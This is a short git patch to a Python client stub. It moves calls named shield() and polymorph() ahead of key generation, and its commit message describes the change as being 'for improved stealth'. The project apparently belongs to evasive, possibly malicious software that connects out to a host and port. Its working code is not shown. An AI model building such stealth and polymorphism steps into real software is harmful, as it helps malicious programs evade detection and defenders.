From 5f2a3100c9c4bef50e0f2ddf8e405e2c1bd161d5 Mon Sep 17 00:00:00 2001 From: Carson Fleming Date: Mon, 18 Dec 2023 17:49:06 -0500 Subject: Fork before performing key generation for improved stealth --- pkcli_stub.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) (limited to 'pkcli_stub.py') diff --git a/pkcli_stub.py b/pkcli_stub.py index 774d5d2..c6561f8 100644 --- a/pkcli_stub.py +++ b/pkcli_stub.py @@ -35,13 +35,14 @@ def main(): ha, port = ha.split(':') port = int(port) - print('working') + print('forking') + shield() + polymorph() + p,q,n,e,d = Crypto.keygen(bits=bits) privkey = { 'n': n, 'd': d } refresh_hdb() print('done') - shield() - polymorph() while True: if not work(ha, port, privkey, bits=bits): -- cgit v1.2.3